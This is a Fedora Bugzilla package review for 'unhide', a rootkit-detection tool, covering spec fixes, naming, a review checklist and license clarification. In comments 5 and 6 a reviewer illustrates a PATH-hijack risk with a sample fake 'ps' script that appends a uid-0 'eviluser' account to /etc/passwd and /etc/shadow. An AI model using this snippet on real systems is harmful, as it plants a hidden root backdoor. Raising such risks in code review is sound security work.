Bug 469843 - (unhide) Review Request: unhide - Tool to find hidden processes and TCP/UDP ports from rootkits
Review Request: unhide - Tool to find hidden processes and TCP/UDP ports from...
Product: Fedora
Classification: Fedora
Component: Package Review (Show other bugs)
All Linux
medium Severity medium
: ---
: ---
Assigned To: manuel wolfshant
Fedora Extras Quality Assurance
Depends On:
  Show dependency treegraph
Reported: 2008-11-04 07:07 EST by Rakesh Pandit
Modified: 2014-01-25 00:08 EST (History)
5 users (show)

See Also:
Fixed In Version: unhide-20130526-1.el6
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Last Closed: 2009-01-08 09:15:44 EST
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---
wolfy: fedora‑review+
limburgher: fedora‑cvs+

Attachments (Terms of Use)

  None (edit)
Description Rakesh Pandit 2008-11-04 07:07:39 EST

SPEC: http://rakesh.fedorapeople.org/spec/unhide.spec
SRPM: http://rakesh.fedorapeople.org/srpm/unhide-20080519-1.fc10.src.rpm

Unhide is a forensic tool to find processes and TCP/UDP ports hidden by
rootkits, Linux kernel modules or by other techniques. It includes two
utilities: unhide and unhide-tcp.

Unhide detects hidden processes using three techniques:

 - comparing the output of /proc and /bin/ps
 - comparing the information gathered from /bin/ps with the one gathered
   from system calls (syscall scanning)
 - full scan of the process ID space (PIDs bruteforcing)

unhide-tcp identifies TCP/UDP ports that are listening but are not listed
in /bin/netstat through brute forcing of all TCP/UDP ports available.
Comment 1 Till Maas 2008-11-07 07:18:17 EST
You probably only need on of these two lines, because the second one will overwrite the output of the first one:

%{__cc} %{optflags} unhide.c -o unhide
%{__cc} %{optflags} unhide-linux26.c -o unhide

Also you do not follow 
Use either $RPM_OPT_FLAGS and $RPM_BUILD_ROOT or %optflags and %buildroot.
Comment 3 manuel wolfshant 2008-11-24 00:08:54 EST
I've just taken a look at the project page and as far as I see, upstream is a bit inconsistent with the name of the source. First version was "unhide.tgz", followed by "unhide02112007.tgz" while the current version seems to be "unhide20080519.tgz" (note the change from day-month-year to year-month-date). I suggest to follow http://fedoraproject.org/wiki/Packaging/NamingGuidelines#Snapshot_packages in naming your package (i.e. change
  Version:        20080519
  Release:        2%{?dist}
  Version:        1.0
  Release:        2%{?dist}.20080519
thus avoiding problems in the future.
Comment 5 manuel wolfshant 2008-12-08 14:57:46 EST
looking at the code, I see that unhide.c does:
    #define COMMAND "ps -eLf | awk '{ print $2 }' | grep -v PID"
followed by  
    fich_tmp=popen (COMMAND, "r") ;

Now, my C is quite rusty, but 
- AFAIR, you must be root to see some of the info this program requires
- anything named "ps" and found in root's PATH will be launched by the above code

To be honest, I would not run this "security application" on my system. I am afraid of something along 
cat >> /usr/local/bin/ps << EOF
#! /bin/bash
echo "eviluser:x:0:0:root:/root:/bin/bash" >> /etc/passwd
echo "eviluser:$1$FvAHRp.t$nuD9eJQjgdgE7aXBNfBM/1:13805:0:99999:7:::" >> /etc/shadow
/bin/ps $*
Comment 6 Till Maas 2008-12-08 15:21:54 EST
(In reply to comment #5)

> To be honest, I would not run this "security application" on my system. I am
> afraid of something along 
> cat >> /usr/local/bin/ps << EOF
> #! /bin/bash
> echo "eviluser:x:0:0:root:/root:/bin/bash" >> /etc/passwd
> echo "eviluser:$1$FvAHRp.t$nuD9eJQjgdgE7aXBNfBM/1:13805:0:99999:7:::" >>
> /etc/shadow
> /bin/ps $*

/usr/local/bin is only writable by root and how does not packaging unhide prevent you from this attack? Or do you never use ps without an absolute path as root? Nevertheless, the attacker could also do this for any binary on the system, not only ps.
Comment 7 manuel wolfshant 2008-12-12 16:02:12 EST
Package Review

 - = N/A
 x = Check
 ! = Problem
 ? = Not evaluated

 [x] Package is named according to the Package Naming Guidelines.
 [x] Spec file name must match the base package %{name}, in the format %{name}.spec.
 [x] Package meets the Packaging Guidelines.
 [x] Package successfully compiles and builds into binary rpms on at least one supported architecture.
     Tested on: devel/x86_64
 [x] Rpmlint output:
source rpm: empty
binary rpm:
unhide.x86_64: W: incoherent-version-in-changelog 1.0-1 ['1.0-1.fc11.20080519', '1.0-1.20080519']
=> benign, but a fix would be nice
 [x] Package is not relocatable.
 [x] Buildroot is correct (%{_tmppath}/%{name}-%{version}-%{release}-root-%(%{__id_u} -n))
 [x] Package is licensed with an open-source compatible license and meets other legal requirements as defined in the legal section of Packaging Guidelines.
 [x] License field in the package spec file matches the actual license.
     License type as specified by source: GPLv3+
 [x] If (and only if) the source package includes the text of the license(s) in its own file, then that file, containing the text of the license(s) for the package is included in %doc.
 [x] Spec file is legible and written in American English.
 [x] Sources used to build the package match the upstream source, as provided in the spec URL.
     SHA1SUM of package: 93f9c11de8beef78790ecaf1423dbcdf22532e53  /tmp/unhide20080519.tgz
 [x] Package is not known to require ExcludeArch
 [x] All build dependencies are listed in BuildRequires, except for any that are listed in the exceptions section of Packaging Guidelines.
 [-] The spec file handles locales properly.
 [-] ldconfig called in %post and %postun if required.
 [x] Package must own all directories that it creates.
 [-] Package requires other packages for directories it uses.
 [x] Package does not contain duplicates in %files.
 [x] Permissions on files are set properly.
 [x] Package has a %clean section, which contains rm -rf %{buildroot}.
 [x] Package consistently uses macros.
 [x] Package contains code, or permissable content.
 [-] Large documentation files are in a -doc subpackage, if required.
 [x] Package uses nothing in %doc for runtime.
 [-] Header files in -devel subpackage, if present.
 [-] Static libraries in -devel subpackage, if present.
 [-] Package requires pkgconfig, if .pc files are present.
 [-] Development .so files in -devel subpackage, if present.
 [-] Fully versioned dependency in subpackages, if present.
 [x] Package does not contain any libtool archives (.la).
 [-] Package contains a properly installed %{name}.desktop file if it is a GUI application.
 [x] Package does not own files or directories owned by other packages.
 [x] Final provides and requires are sane.

 [x] Latest version is packaged.
 [x] Package does not include license text files separate from upstream.
 [-] Description and summary sections in the package spec file contains translations for supported Non-English langua
ges, if available.
 [x] Reviewer should test that the package builds in mock.
     Tested on: devel/x86_64, F7/x86_64
 [?] Package should compile and build into binary rpms on all supported architectures.
 [x] Package functions as described.
 [-] Scriptlets must be sane, if used.
 [-] The placement of pkgconfig(.pc) files is correct.
 [-] File based requires are sane.
 [-] %check is present and the test passes.

===Notes ===
1. Author's intent seems to be GPLv3+, but the sources do not include the bits required to specify this. I recommend getting in touch with the author and asking him to include the license in the source files, not only in the bundled readme files (spanish/eng)

Comment 8 Rakesh Pandit 2008-12-13 01:49:29 EST
Ok - I will communicate this to upstream.

New Package CVS Request
Package Name: unhide
Short Description: Tool to find hidden processes and TCP/UDP ports from rootkits
Owners: rakesh
Branches: F-8 F-9 F-10
Cvsextras Commits: yes
Comment 9 Kevin Fenzi 2008-12-14 00:25:02 EST
Humm... the README.txt contains: 

// License

GPL V.3 (http://www.gnu.org/licenses/gpl-3.0.html)"

Which sure sounds like the license tag should be GPLv3 here, not GPLv3+
In any case it might be good to clarify that before importing and building? 

cvs done, but please clarify before importing. (F-8 branches are no longer accepted, so this was left out).
Comment 10 Rakesh Pandit 2008-12-14 05:41:52 EST
Yes, I have already dropped a mail. Which check before importing or building.
Comment 11 Rakesh Pandit 2009-01-03 13:31:22 EST
No reply regarding license. I have resend the message. Probably maintainer is on holidays. Lets wait for few more days.
Comment 12 Rakesh Pandit 2009-01-07 07:53:13 EST
It is GPLv3 only.
Got a reply today from author. I will import now. I have requested for inclusion of license in source files also.

Comment 13 Fedora Update System 2009-01-08 00:50:46 EST
unhide-1.0-2.fc10.20080519 has been submitted as an update for Fedora 10.
Comment 14 Fedora Update System 2009-01-08 00:51:44 EST
unhide-1.0-2.fc9.20080519 has been submitted as an update for Fedora 9.
Comment 15 Christopher Meng 2014-01-08 12:16:21 EST
Package Change Request
Package Name: unhide
New Branches: el6
Owners: cicku
Comment 16 Gwyn Ciesla 2014-01-08 13:46:32 EST
Git done (by process-git-requests).
Comment 17 Fedora Update System 2014-01-09 04:06:07 EST
unhide-20130526-1.el6 has been submitted as an update for Fedora EPEL 6.
Comment 18 Fedora Update System 2014-01-25 00:08:19 EST
unhide-20130526-1.el6 has been pushed to the Fedora EPEL 6 stable repository.

Note You need to log in before you can comment on or make changes to this bug.